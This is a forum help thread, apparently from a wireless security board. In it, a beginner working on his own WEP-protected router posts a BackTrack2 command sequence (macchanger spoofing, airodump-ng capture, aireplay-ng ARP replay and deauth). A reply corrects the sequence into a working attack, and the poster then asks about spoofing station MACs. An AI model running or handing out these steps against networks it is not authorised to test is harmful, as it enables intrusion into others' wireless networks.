WHAT??? you provided no info at all. as far as im concerned, this is just plain spam. you big spammer you!!!lol
First of all I am trying to learn this using my network setup.
I have following hardware
WHAT??? you provided no info at all. as far as im concerned, this is just plain spam. you big spammer you!!!lol
First of all I am trying to learn this using my network setup.
I have following hardware 1) dell latitude C640 laptop 2) Netgear WG511T card 3) using Backtrack2 software 4) have belkin router with 64 bit key
I boot-up with Backtrack2 and here is my sequence
1) airmon-ng stop ath0
2) ifconfig wifi0 down
3) macchanger --mac=00:11:22:33:44:55 wifi0
4) airmon-ng start wifi0
my wireless starts in monitor mode
5) start kismet
in the kismet window the ip address for all the wireless is alway 00's
I think I should see real ip addresses
6) airodump-ng -w capture -c 11 ath0
no IVs are counted- the beacone are counted very fast
7) aireplay-ng --arpreplay -b BSSID -h stationID ath0
8) aireplay-ng -e SSID -a BSSID -c stationID --deauth 10 ath0
The error I see is " Notice:got a deauth/disassoc packets. Is the source MAC associated?"
I must be missing something, so that the source mac is not associated.
Can someone help please?
I am newbie.
Thank you for your help
New thread merged with old. No reason to start a new thread, just edit your previous posts! D'oh!
"\x74\x68\x65\x70\x72\x65\x7a\x39\x38";
1) airmon-ng stop ath0
2) ifconfig wifi0 down
3) macchanger --mac=00:11:22:33:44:55 wifi0
4) airmon-ng start wifi0
my wireless starts in monitor mode
skip this ->5) start kismet
6) airodump-ng -w capture -c 11 ath0<-get your info from this
7) aireplay-ng -1 0 -e <ap name> -a <ap mac> -h 00:11:22:33:44:55 ath0
8) aireplay-ng --arpreplay -b BSSID -h stationID ath0
skip this -> 9) aireplay-ng -e SSID -a BSSID -c stationID --deauth 10 ath0
see if that makes any difference for ya. if not just post back!!
Thank you Baxter,
The changes you made worked and now I can count the IVs.
Now, Is there anyway I can use fake "station MAC". I like to learn to do this with fake 'station ID'.
Thank you for your help.